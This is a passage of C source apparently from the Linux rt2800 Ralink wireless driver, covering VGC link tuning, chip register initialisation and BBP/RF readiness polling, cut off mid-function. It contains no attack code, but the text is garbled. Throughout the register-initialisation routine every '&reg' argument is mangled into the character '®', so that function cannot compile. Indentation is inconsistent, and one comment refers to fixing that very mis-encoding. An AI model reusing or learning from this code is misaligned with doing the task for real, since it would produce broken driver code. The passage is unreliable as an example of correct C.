 * requires it) and remember it in the link quality state. No-op when the
 * value is unchanged.
 */
static inline void rt2800_set_vgc(struct rt2x00_dev *rt2x00dev,
				  struct link_qual *qual, u8 vgc_level)
{
	if (qual->vgc_level == vgc_level)
		return;

	if (rt2x00_rt(rt2x00dev, RT3572) || rt2x00_rt(rt2x00dev, RT3593)) {
		rt2800_bbp_write_with_rx_chain(rt2x00dev, 66, vgc_level);
	} else if (rt2x00_rt(rt2x00dev, RT5592)) {
		rt2800_bbp_write(rt2x00dev, 83, qual->rssi > -65 ? 0x4a : 0x7a);
		rt2800_bbp_write_with_rx_chain(rt2x00dev, 66, vgc_level);
	} else {
		rt2800_bbp_write(rt2x00dev, 66, vgc_level);
	}

	qual->vgc_level = vgc_level;
	qual->vgc_level_reg = vgc_level;
}
void rt2800_reset_tuner(struct rt2x00_dev *rt2x00dev, struct link_qual *qual)
{
rt2800_set_vgc(rt2x00dev, qual, rt2800_get_default_vgc(rt2x00dev));
}
EXPORT_SYMBOL_GPL(rt2800_reset_tuner);
/*
 * rt2800_link_tuner - periodic VGC adjustment based on link quality.
 *
 * RT2860C silicon is excluded from tuning entirely. Starting from the
 * chip default, the VGC is raised by a chip-specific offset once the RSSI
 * exceeds a threshold, trading sensitivity for noise isolation.
 */
void rt2800_link_tuner(struct rt2x00_dev *rt2x00dev, struct link_qual *qual,
		       const u32 count)
{
	u8 vgc;

	if (rt2x00_rt_rev(rt2x00dev, RT2860, REV_RT2860C))
		return;

	/* When RSSI is better than a certain threshold, increase VGC
	 * with a chip specific value in order to improve the balance
	 * between sensibility and noise isolation.
	 */
	vgc = rt2800_get_default_vgc(rt2x00dev);

	if (rt2x00_rt(rt2x00dev, RT3572) || rt2x00_rt(rt2x00dev, RT3593)) {
		if (qual->rssi > -65) {
			if (rt2x00dev->curr_band == IEEE80211_BAND_2GHZ)
				vgc += 0x20;
			else
				vgc += 0x10;
		}
	} else if (rt2x00_rt(rt2x00dev, RT5592)) {
		if (qual->rssi > -65)
			vgc += 0x20;
	} else {
		if (qual->rssi > -80)
			vgc += 0x10;
	}

	rt2800_set_vgc(rt2x00dev, qual, vgc);
}
EXPORT_SYMBOL_GPL(rt2800_link_tuner);
/*
* Initialization functions.
*/
static int rt2800_init_registers(struct rt2x00_dev *rt2x00dev)
{
u32 reg;
u16 eeprom;
unsigned int i;
int ret;
rt2800_disable_wpdma(rt2x00dev);
ret = rt2800_drv_init_registers(rt2x00dev);
if (ret)
return ret;
rt2800_register_write(rt2x00dev, LEGACY_BASIC_RATE, 0x0000013f);
rt2800_register_write(rt2x00dev, HT_BASIC_RATE, 0x00008003);
rt2800_register_write(rt2x00dev, MAC_SYS_CTRL, 0x00000000);
rt2800_register_read(rt2x00dev, BCN_TIME_CFG, ®);
rt2x00_set_field32(®, BCN_TIME_CFG_BEACON_INTERVAL, 1600);
rt2x00_set_field32(®, BCN_TIME_CFG_TSF_TICKING, 0);
rt2x00_set_field32(®, BCN_TIME_CFG_TSF_SYNC, 0);
rt2x00_set_field32(®, BCN_TIME_CFG_TBTT_ENABLE, 0);
rt2x00_set_field32(®, BCN_TIME_CFG_BEACON_GEN, 0);
rt2x00_set_field32(®, BCN_TIME_CFG_TX_TIME_COMPENSATE, 0);
rt2800_register_write(rt2x00dev, BCN_TIME_CFG, reg);
rt2800_config_filter(rt2x00dev, FIF_ALLMULTI);
rt2800_register_read(rt2x00dev, BKOFF_SLOT_CFG, ®);
rt2x00_set_field32(®, BKOFF_SLOT_CFG_SLOT_TIME, 9);
rt2x00_set_field32(®, BKOFF_SLOT_CFG_CC_DELAY_TIME, 2);
rt2800_register_write(rt2x00dev, BKOFF_SLOT_CFG, reg);
if (rt2x00_rt(rt2x00dev, RT3290)) {
rt2800_register_read(rt2x00dev, WLAN_FUN_CTRL, ®);
if (rt2x00_get_field32(reg, WLAN_EN) == 1) {
rt2x00_set_field32(®, PCIE_APP0_CLK_REQ, 1);
rt2800_register_write(rt2x00dev, WLAN_FUN_CTRL, reg);
}
rt2800_register_read(rt2x00dev, CMB_CTRL, ®);
if (!(rt2x00_get_field32(reg, LDO0_EN) == 1)) {
rt2x00_set_field32(®, LDO0_EN, 1);
rt2x00_set_field32(®, LDO_BGSEL, 3);
rt2800_register_write(rt2x00dev, CMB_CTRL, reg);
}
rt2800_register_read(rt2x00dev, OSC_CTRL, ®);
rt2x00_set_field32(®, OSC_ROSC_EN, 1);
rt2x00_set_field32(®, OSC_CAL_REQ, 1);
rt2x00_set_field32(®, OSC_REF_CYCLE, 0x27);
rt2800_register_write(rt2x00dev, OSC_CTRL, reg);
rt2800_register_read(rt2x00dev, COEX_CFG0, ®);
rt2x00_set_field32(®, COEX_CFG_ANT, 0x5e);
rt2800_register_write(rt2x00dev, COEX_CFG0, reg);
rt2800_register_read(rt2x00dev, COEX_CFG2, ®);
rt2x00_set_field32(®, BT_COEX_CFG1, 0x00);
rt2x00_set_field32(®, BT_COEX_CFG0, 0x17);
rt2x00_set_field32(®, WL_COEX_CFG1, 0x93);
rt2x00_set_field32(®, WL_COEX_CFG0, 0x7f);
rt2800_register_write(rt2x00dev, COEX_CFG2, reg);
rt2800_register_read(rt2x00dev, PLL_CTRL, ®);
rt2x00_set_field32(®, PLL_CONTROL, 1);
rt2800_register_write(rt2x00dev, PLL_CTRL, reg);
}
if (rt2x00_rt(rt2x00dev, RT3071) ||
rt2x00_rt(rt2x00dev, RT3090) ||
rt2x00_rt(rt2x00dev, RT3290) ||
rt2x00_rt(rt2x00dev, RT3390)) {
if (rt2x00_rt(rt2x00dev, RT3290))
rt2800_register_write(rt2x00dev, TX_SW_CFG0,
0x00000404);
else
rt2800_register_write(rt2x00dev, TX_SW_CFG0,
0x00000400);
rt2800_register_write(rt2x00dev, TX_SW_CFG1, 0x00000000);
if (rt2x00_rt_rev_lt(rt2x00dev, RT3071, REV_RT3071E) ||
rt2x00_rt_rev_lt(rt2x00dev, RT3090, REV_RT3090E) ||
rt2x00_rt_rev_lt(rt2x00dev, RT3390, REV_RT3390E)) {
rt2800_eeprom_read(rt2x00dev, EEPROM_NIC_CONF1,
&eeprom);
if (rt2x00_get_field16(eeprom, EEPROM_NIC_CONF1_DAC_TEST))
rt2800_register_write(rt2x00dev, TX_SW_CFG2,
0x0000002c);
else
rt2800_register_write(rt2x00dev, TX_SW_CFG2,
0x0000000f);
} else {
rt2800_register_write(rt2x00dev, TX_SW_CFG2, 0x00000000);
}
} else if (rt2x00_rt(rt2x00dev, RT3070)) {
rt2800_register_write(rt2x00dev, TX_SW_CFG0, 0x00000400);
if (rt2x00_rt_rev_lt(rt2x00dev, RT3070, REV_RT3070F)) {
rt2800_register_write(rt2x00dev, TX_SW_CFG1, 0x00000000);
rt2800_register_write(rt2x00dev, TX_SW_CFG2, 0x0000002c);
} else {
rt2800_register_write(rt2x00dev, TX_SW_CFG1, 0x00080606);
rt2800_register_write(rt2x00dev, TX_SW_CFG2, 0x00000000);
}
} else if (rt2800_is_305x_soc(rt2x00dev)) {
rt2800_register_write(rt2x00dev, TX_SW_CFG0, 0x00000400);
rt2800_register_write(rt2x00dev, TX_SW_CFG1, 0x00000000);
rt2800_register_write(rt2x00dev, TX_SW_CFG2, 0x00000030);
} else if (rt2x00_rt(rt2x00dev, RT3352)) {
rt2800_register_write(rt2x00dev, TX_SW_CFG0, 0x00000402);
rt2800_register_write(rt2x00dev, TX_SW_CFG1, 0x00080606);
rt2800_register_write(rt2x00dev, TX_SW_CFG2, 0x00000000);
} else if (rt2x00_rt(rt2x00dev, RT3572)) {
rt2800_register_write(rt2x00dev, TX_SW_CFG0, 0x00000400);
rt2800_register_write(rt2x00dev, TX_SW_CFG1, 0x00080606);
} else if (rt2x00_rt(rt2x00dev, RT3593)) {
rt2800_register_write(rt2x00dev, TX_SW_CFG0, 0x00000402);
rt2800_register_write(rt2x00dev, TX_SW_CFG1, 0x00000000);
if (rt2x00_rt_rev_lt(rt2x00dev, RT3593, REV_RT3593E)) {
rt2800_eeprom_read(rt2x00dev, EEPROM_NIC_CONF1,
&eeprom);
if (rt2x00_get_field16(eeprom,
EEPROM_NIC_CONF1_DAC_TEST))
rt2800_register_write(rt2x00dev, TX_SW_CFG2,
0x0000001f);
else
rt2800_register_write(rt2x00dev, TX_SW_CFG2,
0x0000000f);
} else {
rt2800_register_write(rt2x00dev, TX_SW_CFG2,
0x00000000);
}
} else if (rt2x00_rt(rt2x00dev, RT5390) ||
rt2x00_rt(rt2x00dev, RT5392) ||
rt2x00_rt(rt2x00dev, RT5592)) {
rt2800_register_write(rt2x00dev, TX_SW_CFG0, 0x00000404);
rt2800_register_write(rt2x00dev, TX_SW_CFG1, 0x00080606);
rt2800_register_write(rt2x00dev, TX_SW_CFG2, 0x00000000);
} else {
rt2800_register_write(rt2x00dev, TX_SW_CFG0, 0x00000000);
rt2800_register_write(rt2x00dev, TX_SW_CFG1, 0x00080606);
}
rt2800_register_read(rt2x00dev, TX_LINK_CFG, ®);
rt2x00_set_field32(®, TX_LINK_CFG_REMOTE_MFB_LIFETIME, 32);
rt2x00_set_field32(®, TX_LINK_CFG_MFB_ENABLE, 0);
rt2x00_set_field32(®, TX_LINK_CFG_REMOTE_UMFS_ENABLE, 0);
rt2x00_set_field32(®, TX_LINK_CFG_TX_MRQ_EN, 0);
rt2x00_set_field32(®, TX_LINK_CFG_TX_RDG_EN, 0);
rt2x00_set_field32(®, TX_LINK_CFG_TX_CF_ACK_EN, 1);
rt2x00_set_field32(®, TX_LINK_CFG_REMOTE_MFB, 0);
rt2x00_set_field32(®, TX_LINK_CFG_REMOTE_MFS, 0);
rt2800_register_write(rt2x00dev, TX_LINK_CFG, reg);
rt2800_register_read(rt2x00dev, TX_TIMEOUT_CFG, ®);
rt2x00_set_field32(®, TX_TIMEOUT_CFG_MPDU_LIFETIME, 9);
rt2x00_set_field32(®, TX_TIMEOUT_CFG_RX_ACK_TIMEOUT, 32);
rt2x00_set_field32(®, TX_TIMEOUT_CFG_TX_OP_TIMEOUT, 10);
rt2800_register_write(rt2x00dev, TX_TIMEOUT_CFG, reg);
rt2800_register_read(rt2x00dev, MAX_LEN_CFG, ®);
rt2x00_set_field32(®, MAX_LEN_CFG_MAX_MPDU, AGGREGATION_SIZE);
if (rt2x00_rt_rev_gte(rt2x00dev, RT2872, REV_RT2872E) ||
rt2x00_rt(rt2x00dev, RT2883) ||
rt2x00_rt_rev_lt(rt2x00dev, RT3070, REV_RT3070E))
rt2x00_set_field32(®, MAX_LEN_CFG_MAX_PSDU, 2);
else
rt2x00_set_field32(®, MAX_LEN_CFG_MAX_PSDU, 1);
rt2x00_set_field32(®, MAX_LEN_CFG_MIN_PSDU, 0);
rt2x00_set_field32(®, MAX_LEN_CFG_MIN_MPDU, 0);
rt2800_register_write(rt2x00dev, MAX_LEN_CFG, reg);
rt2800_register_read(rt2x00dev, LED_CFG, ®);
rt2x00_set_field32(®, LED_CFG_ON_PERIOD, 70);
rt2x00_set_field32(®, LED_CFG_OFF_PERIOD, 30);
rt2x00_set_field32(®, LED_CFG_SLOW_BLINK_PERIOD, 3);
rt2x00_set_field32(®, LED_CFG_R_LED_MODE, 3);
rt2x00_set_field32(®, LED_CFG_G_LED_MODE, 3);
rt2x00_set_field32(®, LED_CFG_Y_LED_MODE, 3);
rt2x00_set_field32(®, LED_CFG_LED_POLAR, 1);
rt2800_register_write(rt2x00dev, LED_CFG, reg);
rt2800_register_write(rt2x00dev, PBF_MAX_PCNT, 0x1f3fbf9f);
rt2800_register_read(rt2x00dev, TX_RTY_CFG, ®);
rt2x00_set_field32(®, TX_RTY_CFG_SHORT_RTY_LIMIT, 15);
rt2x00_set_field32(®, TX_RTY_CFG_LONG_RTY_LIMIT, 31);
rt2x00_set_field32(®, TX_RTY_CFG_LONG_RTY_THRE, 2000);
rt2x00_set_field32(®, TX_RTY_CFG_NON_AGG_RTY_MODE, 0);
rt2x00_set_field32(®, TX_RTY_CFG_AGG_RTY_MODE, 0);
rt2x00_set_field32(®, TX_RTY_CFG_TX_AUTO_FB_ENABLE, 1);
rt2800_register_write(rt2x00dev, TX_RTY_CFG, reg);
rt2800_register_read(rt2x00dev, AUTO_RSP_CFG, ®);
rt2x00_set_field32(®, AUTO_RSP_CFG_AUTORESPONDER, 1);
rt2x00_set_field32(®, AUTO_RSP_CFG_BAC_ACK_POLICY, 1);
rt2x00_set_field32(®, AUTO_RSP_CFG_CTS_40_MMODE, 0);
rt2x00_set_field32(®, AUTO_RSP_CFG_CTS_40_MREF, 0);
rt2x00_set_field32(®, AUTO_RSP_CFG_AR_PREAMBLE, 1);
rt2x00_set_field32(®, AUTO_RSP_CFG_DUAL_CTS_EN, 0);
rt2x00_set_field32(®, AUTO_RSP_CFG_ACK_CTS_PSM_BIT, 0);
rt2800_register_write(rt2x00dev, AUTO_RSP_CFG, reg);
rt2800_register_read(rt2x00dev, CCK_PROT_CFG, ®);
rt2x00_set_field32(®, CCK_PROT_CFG_PROTECT_RATE, 3);
rt2x00_set_field32(®, CCK_PROT_CFG_PROTECT_CTRL, 0);
rt2x00_set_field32(®, CCK_PROT_CFG_PROTECT_NAV_SHORT, 1);
rt2x00_set_field32(®, CCK_PROT_CFG_TX_OP_ALLOW_CCK, 1);
rt2x00_set_field32(®, CCK_PROT_CFG_TX_OP_ALLOW_OFDM, 1);
rt2x00_set_field32(®, CCK_PROT_CFG_TX_OP_ALLOW_MM20, 1);
rt2x00_set_field32(®, CCK_PROT_CFG_TX_OP_ALLOW_MM40, 0);
rt2x00_set_field32(®, CCK_PROT_CFG_TX_OP_ALLOW_GF20, 1);
rt2x00_set_field32(®, CCK_PROT_CFG_TX_OP_ALLOW_GF40, 0);
rt2x00_set_field32(®, CCK_PROT_CFG_RTS_TH_EN, 1);
rt2800_register_write(rt2x00dev, CCK_PROT_CFG, reg);
rt2800_register_read(rt2x00dev, OFDM_PROT_CFG, ®);
rt2x00_set_field32(®, OFDM_PROT_CFG_PROTECT_RATE, 3);
rt2x00_set_field32(®, OFDM_PROT_CFG_PROTECT_CTRL, 0);
rt2x00_set_field32(®, OFDM_PROT_CFG_PROTECT_NAV_SHORT, 1);
rt2x00_set_field32(®, OFDM_PROT_CFG_TX_OP_ALLOW_CCK, 1);
rt2x00_set_field32(®, OFDM_PROT_CFG_TX_OP_ALLOW_OFDM, 1);
rt2x00_set_field32(®, OFDM_PROT_CFG_TX_OP_ALLOW_MM20, 1);
rt2x00_set_field32(®, OFDM_PROT_CFG_TX_OP_ALLOW_MM40, 0);
rt2x00_set_field32(®, OFDM_PROT_CFG_TX_OP_ALLOW_GF20, 1);
rt2x00_set_field32(®, OFDM_PROT_CFG_TX_OP_ALLOW_GF40, 0);
rt2x00_set_field32(®, OFDM_PROT_CFG_RTS_TH_EN, 1);
rt2800_register_write(rt2x00dev, OFDM_PROT_CFG, reg);
rt2800_register_read(rt2x00dev, MM20_PROT_CFG, ®);
rt2x00_set_field32(®, MM20_PROT_CFG_PROTECT_RATE, 0x4004);
rt2x00_set_field32(®, MM20_PROT_CFG_PROTECT_CTRL, 0);
rt2x00_set_field32(®, MM20_PROT_CFG_PROTECT_NAV_SHORT, 1);
rt2x00_set_field32(®, MM20_PROT_CFG_TX_OP_ALLOW_CCK, 1);
rt2x00_set_field32(®, MM20_PROT_CFG_TX_OP_ALLOW_OFDM, 1);
rt2x00_set_field32(®, MM20_PROT_CFG_TX_OP_ALLOW_MM20, 1);
rt2x00_set_field32(®, MM20_PROT_CFG_TX_OP_ALLOW_MM40, 0);
rt2x00_set_field32(®, MM20_PROT_CFG_TX_OP_ALLOW_GF20, 1);
rt2x00_set_field32(®, MM20_PROT_CFG_TX_OP_ALLOW_GF40, 0);
rt2x00_set_field32(®, MM20_PROT_CFG_RTS_TH_EN, 0);
rt2800_register_write(rt2x00dev, MM20_PROT_CFG, reg);
rt2800_register_read(rt2x00dev, MM40_PROT_CFG, ®);
rt2x00_set_field32(®, MM40_PROT_CFG_PROTECT_RATE, 0x4084);
rt2x00_set_field32(®, MM40_PROT_CFG_PROTECT_CTRL, 0);
rt2x00_set_field32(®, MM40_PROT_CFG_PROTECT_NAV_SHORT, 1);
rt2x00_set_field32(®, MM40_PROT_CFG_TX_OP_ALLOW_CCK, 1);
rt2x00_set_field32(®, MM40_PROT_CFG_TX_OP_ALLOW_OFDM, 1);
rt2x00_set_field32(®, MM40_PROT_CFG_TX_OP_ALLOW_MM20, 1);
rt2x00_set_field32(®, MM40_PROT_CFG_TX_OP_ALLOW_MM40, 1);
rt2x00_set_field32(®, MM40_PROT_CFG_TX_OP_ALLOW_GF20, 1);
rt2x00_set_field32(®, MM40_PROT_CFG_TX_OP_ALLOW_GF40, 1);
rt2x00_set_field32(®, MM40_PROT_CFG_RTS_TH_EN, 0);
rt2800_register_write(rt2x00dev, MM40_PROT_CFG, reg);
rt2800_register_read(rt2x00dev, GF20_PROT_CFG, ®);
rt2x00_set_field32(®, GF20_PROT_CFG_PROTECT_RATE, 0x4004);
rt2x00_set_field32(®, GF20_PROT_CFG_PROTECT_CTRL, 0);
rt2x00_set_field32(®, GF20_PROT_CFG_PROTECT_NAV_SHORT, 1);
rt2x00_set_field32(®, GF20_PROT_CFG_TX_OP_ALLOW_CCK, 1);
rt2x00_set_field32(®, GF20_PROT_CFG_TX_OP_ALLOW_OFDM, 1);
rt2x00_set_field32(®, GF20_PROT_CFG_TX_OP_ALLOW_MM20, 1);
rt2x00_set_field32(®, GF20_PROT_CFG_TX_OP_ALLOW_MM40, 0);
rt2x00_set_field32(®, GF20_PROT_CFG_TX_OP_ALLOW_GF20, 1);
rt2x00_set_field32(®, GF20_PROT_CFG_TX_OP_ALLOW_GF40, 0);
rt2x00_set_field32(®, GF20_PROT_CFG_RTS_TH_EN, 0);
rt2800_register_write(rt2x00dev, GF20_PROT_CFG, reg);
rt2800_register_read(rt2x00dev, GF40_PROT_CFG, ®);
rt2x00_set_field32(®, GF40_PROT_CFG_PROTECT_RATE, 0x4084);
rt2x00_set_field32(®, GF40_PROT_CFG_PROTECT_CTRL, 0);
rt2x00_set_field32(®, GF40_PROT_CFG_PROTECT_NAV_SHORT, 1);
rt2x00_set_field32(®, GF40_PROT_CFG_TX_OP_ALLOW_CCK, 1);
rt2x00_set_field32(®, GF40_PROT_CFG_TX_OP_ALLOW_OFDM, 1);
rt2x00_set_field32(®, GF40_PROT_CFG_TX_OP_ALLOW_MM20, 1);
rt2x00_set_field32(®, GF40_PROT_CFG_TX_OP_ALLOW_MM40, 1);
rt2x00_set_field32(®, GF40_PROT_CFG_TX_OP_ALLOW_GF20, 1);
rt2x00_set_field32(®, GF40_PROT_CFG_TX_OP_ALLOW_GF40, 1);
rt2x00_set_field32(®, GF40_PROT_CFG_RTS_TH_EN, 0);
rt2800_register_write(rt2x00dev, GF40_PROT_CFG, reg);
if (rt2x00_is_usb(rt2x00dev)) {
rt2800_register_write(rt2x00dev, PBF_CFG, 0xf40006);
rt2800_register_read(rt2x00dev, WPDMA_GLO_CFG, ®);
rt2x00_set_field32(®, WPDMA_GLO_CFG_ENABLE_TX_DMA, 0);
rt2x00_set_field32(®, WPDMA_GLO_CFG_TX_DMA_BUSY, 0);
rt2x00_set_field32(®, WPDMA_GLO_CFG_ENABLE_RX_DMA, 0);
rt2x00_set_field32(®, WPDMA_GLO_CFG_RX_DMA_BUSY, 0);
rt2x00_set_field32(®, WPDMA_GLO_CFG_WP_DMA_BURST_SIZE, 3);
rt2x00_set_field32(®, WPDMA_GLO_CFG_TX_WRITEBACK_DONE, 0);
rt2x00_set_field32(®, WPDMA_GLO_CFG_BIG_ENDIAN, 0);
rt2x00_set_field32(®, WPDMA_GLO_CFG_RX_HDR_SCATTER, 0);
rt2x00_set_field32(®, WPDMA_GLO_CFG_HDR_SEG_LEN, 0);
rt2800_register_write(rt2x00dev, WPDMA_GLO_CFG, reg);
}
/*
* The legacy driver also sets TXOP_CTRL_CFG_RESERVED_TRUN_EN to 1
* although it is reserved.
*/
rt2800_register_read(rt2x00dev, TXOP_CTRL_CFG, ®);
rt2x00_set_field32(®, TXOP_CTRL_CFG_TIMEOUT_TRUN_EN, 1);
rt2x00_set_field32(®, TXOP_CTRL_CFG_AC_TRUN_EN, 1);
rt2x00_set_field32(®, TXOP_CTRL_CFG_TXRATEGRP_TRUN_EN, 1);
rt2x00_set_field32(®, TXOP_CTRL_CFG_USER_MODE_TRUN_EN, 1);
rt2x00_set_field32(®, TXOP_CTRL_CFG_MIMO_PS_TRUN_EN, 1);
rt2x00_set_field32(®, TXOP_CTRL_CFG_RESERVED_TRUN_EN, 1);
rt2x00_set_field32(®, TXOP_CTRL_CFG_LSIG_TXOP_EN, 0);
rt2x00_set_field32(®, TXOP_CTRL_CFG_EXT_CCA_EN, 0);
rt2x00_set_field32(®, TXOP_CTRL_CFG_EXT_CCA_DLY, 88);
rt2x00_set_field32(®, TXOP_CTRL_CFG_EXT_CWMIN, 0);
rt2800_register_write(rt2x00dev, TXOP_CTRL_CFG, reg);
reg = rt2x00_rt(rt2x00dev, RT5592) ? 0x00000082 : 0x00000002;
rt2800_register_write(rt2x00dev, TXOP_HLDR_ET, reg);
rt2800_register_read(rt2x00dev, TX_RTS_CFG, ®);
rt2x00_set_field32(®, TX_RTS_CFG_AUTO_RTS_RETRY_LIMIT, 32);
rt2x00_set_field32(®, TX_RTS_CFG_RTS_THRES,
IEEE80211_MAX_RTS_THRESHOLD);
rt2x00_set_field32(®, TX_RTS_CFG_RTS_FBK_EN, 0);
rt2800_register_write(rt2x00dev, TX_RTS_CFG, reg);
rt2800_register_write(rt2x00dev, EXP_ACK_TIME, 0x002400ca);
/*
* Usually the CCK SIFS time should be set to 10 and the OFDM SIFS
* time should be set to 16. However, the original Ralink driver uses
* 16 for both and indeed using a value of 10 for CCK SIFS results in
* connection problems with 11g + CTS protection. Hence, use the same
* defaults as the Ralink driver: 16 for both, CCK and OFDM SIFS.
*/
rt2800_register_read(rt2x00dev, XIFS_TIME_CFG, ®);
rt2x00_set_field32(®, XIFS_TIME_CFG_CCKM_SIFS_TIME, 16);
rt2x00_set_field32(®, XIFS_TIME_CFG_OFDM_SIFS_TIME, 16);
rt2x00_set_field32(®, XIFS_TIME_CFG_OFDM_XIFS_TIME, 4);
rt2x00_set_field32(®, XIFS_TIME_CFG_EIFS, 314);
rt2x00_set_field32(®, XIFS_TIME_CFG_BB_RXEND_ENABLE, 1);
rt2800_register_write(rt2x00dev, XIFS_TIME_CFG, reg);
rt2800_register_write(rt2x00dev, PWR_PIN_CFG, 0x00000003);
/*
* ASIC will keep garbage value after boot, clear encryption keys.
*/
for (i = 0; i < 4; i++)
rt2800_register_write(rt2x00dev,
SHARED_KEY_MODE_ENTRY(i), 0);
for (i = 0; i < 256; i++) {
rt2800_config_wcid(rt2x00dev, NULL, i);
rt2800_delete_wcid_attr(rt2x00dev, i);
rt2800_register_write(rt2x00dev, MAC_IVEIV_ENTRY(i), 0);
}
/*
* Clear all beacons
*/
for (i = 0; i < 8; i++)
rt2800_clear_beacon_register(rt2x00dev, i);
if (rt2x00_is_usb(rt2x00dev)) {
rt2800_register_read(rt2x00dev, US_CYC_CNT, ®);
rt2x00_set_field32(®, US_CYC_CNT_CLOCK_CYCLE, 30);
rt2800_register_write(rt2x00dev, US_CYC_CNT, reg);
} else if (rt2x00_is_pcie(rt2x00dev)) {
rt2800_register_read(rt2x00dev, US_CYC_CNT, ®);
rt2x00_set_field32(®, US_CYC_CNT_CLOCK_CYCLE, 125);
rt2800_register_write(rt2x00dev, US_CYC_CNT, reg);
}
rt2800_register_read(rt2x00dev, HT_FBK_CFG0, ®);
rt2x00_set_field32(®, HT_FBK_CFG0_HTMCS0FBK, 0);
rt2x00_set_field32(®, HT_FBK_CFG0_HTMCS1FBK, 0);
rt2x00_set_field32(®, HT_FBK_CFG0_HTMCS2FBK, 1);
rt2x00_set_field32(®, HT_FBK_CFG0_HTMCS3FBK, 2);
rt2x00_set_field32(®, HT_FBK_CFG0_HTMCS4FBK, 3);
rt2x00_set_field32(®, HT_FBK_CFG0_HTMCS5FBK, 4);
rt2x00_set_field32(®, HT_FBK_CFG0_HTMCS6FBK, 5);
rt2x00_set_field32(®, HT_FBK_CFG0_HTMCS7FBK, 6);
rt2800_register_write(rt2x00dev, HT_FBK_CFG0, reg);
rt2800_register_read(rt2x00dev, HT_FBK_CFG1, ®);
rt2x00_set_field32(®, HT_FBK_CFG1_HTMCS8FBK, 8);
rt2x00_set_field32(®, HT_FBK_CFG1_HTMCS9FBK, 8);
rt2x00_set_field32(®, HT_FBK_CFG1_HTMCS10FBK, 9);
rt2x00_set_field32(®, HT_FBK_CFG1_HTMCS11FBK, 10);
rt2x00_set_field32(®, HT_FBK_CFG1_HTMCS12FBK, 11);
rt2x00_set_field32(®, HT_FBK_CFG1_HTMCS13FBK, 12);
rt2x00_set_field32(®, HT_FBK_CFG1_HTMCS14FBK, 13);
rt2x00_set_field32(®, HT_FBK_CFG1_HTMCS15FBK, 14);
rt2800_register_write(rt2x00dev, HT_FBK_CFG1, reg);
rt2800_register_read(rt2x00dev, LG_FBK_CFG0, ®);
rt2x00_set_field32(®, LG_FBK_CFG0_OFDMMCS0FBK, 8);
rt2x00_set_field32(®, LG_FBK_CFG0_OFDMMCS1FBK, 8);
rt2x00_set_field32(®, LG_FBK_CFG0_OFDMMCS2FBK, 9);
rt2x00_set_field32(®, LG_FBK_CFG0_OFDMMCS3FBK, 10);
rt2x00_set_field32(®, LG_FBK_CFG0_OFDMMCS4FBK, 11);
rt2x00_set_field32(®, LG_FBK_CFG0_OFDMMCS5FBK, 12);
rt2x00_set_field32(®, LG_FBK_CFG0_OFDMMCS6FBK, 13);
rt2x00_set_field32(®, LG_FBK_CFG0_OFDMMCS7FBK, 14);
rt2800_register_write(rt2x00dev, LG_FBK_CFG0, reg);
rt2800_register_read(rt2x00dev, LG_FBK_CFG1, ®);
rt2x00_set_field32(®, LG_FBK_CFG0_CCKMCS0FBK, 0);
rt2x00_set_field32(®, LG_FBK_CFG0_CCKMCS1FBK, 0);
rt2x00_set_field32(®, LG_FBK_CFG0_CCKMCS2FBK, 1);
rt2x00_set_field32(®, LG_FBK_CFG0_CCKMCS3FBK, 2);
rt2800_register_write(rt2x00dev, LG_FBK_CFG1, reg);
/*
* Do not force the BA window size, we use the TXWI to set it
*/
rt2800_register_read(rt2x00dev, AMPDU_BA_WINSIZE, ®);
rt2x00_set_field32(®, AMPDU_BA_WINSIZE_FORCE_WINSIZE_ENABLE, 0);
rt2x00_set_field32(®, AMPDU_BA_WINSIZE_FORCE_WINSIZE, 0);
rt2800_register_write(rt2x00dev, AMPDU_BA_WINSIZE, reg);
/*
* We must clear the error counters.
* These registers are cleared on read,
* so we may pass a useless variable to store the value.
*/
rt2800_register_read(rt2x00dev, RX_STA_CNT0, ®);
rt2800_register_read(rt2x00dev, RX_STA_CNT1, ®);
rt2800_register_read(rt2x00dev, RX_STA_CNT2, ®);
rt2800_register_read(rt2x00dev, TX_STA_CNT0, ®);
rt2800_register_read(rt2x00dev, TX_STA_CNT1, ®);
rt2800_register_read(rt2x00dev, TX_STA_CNT2, ®);
/*
* Setup leadtime for pre tbtt interrupt to 6ms
*/
rt2800_register_read(rt2x00dev, INT_TIMER_CFG, ®);
rt2x00_set_field32(®, INT_TIMER_CFG_PRE_TBTT_TIMER, 6 << 4);
rt2800_register_write(rt2x00dev, INT_TIMER_CFG, reg);
/*
* Set up channel statistics timer
*/
rt2800_register_read(rt2x00dev, CH_TIME_CFG, ®);
rt2x00_set_field32(®, CH_TIME_CFG_EIFS_BUSY, 1);
rt2x00_set_field32(®, CH_TIME_CFG_NAV_BUSY, 1);
rt2x00_set_field32(®, CH_TIME_CFG_RX_BUSY, 1);
rt2x00_set_field32(®, CH_TIME_CFG_TX_BUSY, 1);
rt2x00_set_field32(®, CH_TIME_CFG_TMR_EN, 1);
rt2800_register_write(rt2x00dev, CH_TIME_CFG, reg);
return 0;
}
/*
 * rt2800_wait_bbp_rf_ready - poll until the BBP/RF bus is idle.
 *
 * Polls MAC_STATUS_CFG up to REGISTER_BUSY_COUNT times, waiting
 * REGISTER_BUSY_DELAY microseconds between attempts. Fixes the
 * mis-encoded '&reg' argument so the code compiles again.
 *
 * Returns 0 when the busy flag clears, -EACCES on timeout.
 */
static int rt2800_wait_bbp_rf_ready(struct rt2x00_dev *rt2x00dev)
{
	unsigned int i;
	u32 reg;

	for (i = 0; i < REGISTER_BUSY_COUNT; i++) {
		rt2800_register_read(rt2x00dev, MAC_STATUS_CFG, &reg);
		if (!rt2x00_get_field32(reg, MAC_STATUS_CFG_BBP_RF_BUSY))
			return 0;

		udelay(REGISTER_BUSY_DELAY);
	}

	rt2x00_err(rt2x00dev, "BBP/RF register access failed, aborting\n");
	return -EACCES;
}
/*
 * rt2800_wait_bbp_ready - reactivate the BBP and wait for it to respond.
 *
 * Clears the H2M agent/mailbox registers, then polls BBP register 0 until
 * it returns something other than the 0x00/0xff reset patterns.
 *
 * Returns 0 once the BBP responds, -EACCES after REGISTER_BUSY_COUNT tries.
 */
static int rt2800_wait_bbp_ready(struct rt2x00_dev *rt2x00dev)
{
	unsigned int attempt;
	u8 value;

	/*
	 * BBP was enabled after firmware was loaded,
	 * but we need to reactivate it now.
	 */
	rt2800_register_write(rt2x00dev, H2M_BBP_AGENT, 0);
	rt2800_register_write(rt2x00dev, H2M_MAILBOX_CSR, 0);
	msleep(1);

	for (attempt = 0; attempt < REGISTER_BUSY_COUNT; attempt++) {
		rt2800_bbp_read(rt2x00dev, 0, &value);
		if (value != 0xff && value != 0x00)
			return 0;
		udelay(REGISTER_BUSY_DELAY);
	}

	rt2x00_err(rt2x00dev, "BBP register access failed, aborting\n");
